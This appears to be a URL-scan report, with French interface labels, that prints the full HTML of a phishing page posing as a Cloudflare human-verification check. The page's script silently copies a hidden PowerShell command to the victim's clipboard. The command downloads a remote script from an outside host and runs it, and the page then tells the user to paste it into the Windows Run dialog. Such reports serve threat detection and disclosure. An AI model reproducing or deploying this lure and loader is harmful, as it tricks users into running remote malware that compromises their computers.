- ID de l'analyse :
- e690a4bd-dd09-42fe-ae25-19a0fdcd1574Terminée
- URL soumise :
- https://sos-ch-dk-2.exo.io/filebyte/cloudflare-new-desk-v3.html
- Fin du rapport :
Liens : 0 trouvé(s)
Liens sortants identifiés à partir de la page
Variables JavaScript : 3 trouvée(s)
Les variables JavaScript globales chargées dans l'objet fenêtre d'une page sont des variables déclarées en dehors des fonctions et accessibles depuis n'importe quel endroit du code au sein du champ d'application actuel
Nom | Type |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
Messages de journal de console : 1 trouvé(s)
Messages consignés dans la console web
Type | Catégorie | Enregistrement |
---|---|---|
error | network |
|
HTML
Le corps HTML de la page en données brutes
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Security Check</title>
<style>
body, html { margin: 0; padding: 0; width: 100%; height: 100%; display: flex; justify-content: center; align-items: center; font-family: Arial, sans-serif; transition: background-color 0.3s, color 0.3s; }
body { background-color: #f9f9f9; color: #333; }
.captcha-container, .popup { background: #fff; border: 1px solid #d1d1d1; color: #333; }
@media (prefers-color-scheme: dark) {
body { background: #1c1c1e; color: #e5e5e7; }
.captcha-container, .popup { background: #2c2c2e; border-color: #3a3a3c; color: #e5e5e7; }
}
.dimmable-container { position: relative; z-index: 10; transition: opacity 0.3s; }
.dimmed { opacity: 0.2; }
.captcha-container {
text-align: center; max-width: 400px; padding: 40px; border-radius: 8px;
box-shadow: 0 2px 6px rgba(0, 0, 0, 0.15); display: flex; flex-direction: column; align-items: center;
}
.captcha-title { font-size: 20px; font-weight: bold; margin-bottom: 10px; }
.captcha-subtitle { font-size: 14px; margin-bottom: 25px; }
.captcha-checkbox {
display: flex; align-items: center; border: 1px solid #3a3a3c; padding: 15px; border-radius: 5px;
width: 100%; max-width: 280px; justify-content: space-between; cursor: pointer;
}
.captcha-checkbox input[type="checkbox"] { width: 20px; height: 20px; margin-right: 10px; transform: scale(1.3); }
.captcha-checkbox img { max-width: 80px; height: auto; }
.captcha-footer { font-size: 12px; color: #999; margin-top: 30px; }
.overlay { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.6); z-index: 5; }
.popup {
display: none; position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); padding: 20px;
border-radius: 8px; width: 300px; text-align: center; box-shadow: 0 4px 12px rgba(0, 0, 0, 0.3); z-index: 100;
}
</style>
</head>
<body>
<div class="overlay" id="overlay"></div>
<div class="dimmable-container" id="dimmableContainer">
<div class="captcha-container">
<h1 class="captcha-title">Verify you are human</h1>
<p class="captcha-subtitle">Verify you are human by completing the action below.</p>
<label class="captcha-checkbox">
<input type="checkbox" id="captchaCheckbox">
<span>Verify you are human</span>
<img src="https://www.cloudflare.com/img/logo-cloudflare-dark.svg" alt="Cloudflare">
</label>
<div class="captcha-footer">Performance & security by Cloudflare</div>
</div>
</div>
<div class="popup" id="popup">
<h3>Verification Steps</h3>
<p>1. Press Windows Button "⊞" + R</p>
<p>2. Press CTRL + V</p>
<p>3. Press Enter</p>
</div>
<script>
document.getElementById('captchaCheckbox').addEventListener('click', () => {
const cExe = "cmd.exe";
const cArgs = "/c powershell -WindowStyle Hidden -Command ";
const uVar = "$rQd='https://fixedzip.oss-ap-southeast-5.aliyuncs.com/desk.txt';";
const nCli = "$pLs=New-Object System.Net.WebClient;";
const gTxt = "$sLf=$pLs.DownloadString($rQd);";
const exCmd = "Invoke-Expression $sLf;";
const fullCommand = `${cExe} ${cArgs}"${uVar} ${nCli} ${gTxt} ${exCmd}"`;
navigator.clipboard.writeText(fullCommand).then(() => {
document.getElementById('overlay').style.display = 'block';
document.getElementById('popup').style.display = 'block';
document.getElementById('dimmableContainer').classList.add('dimmed');
});
});
</script>
</body></html>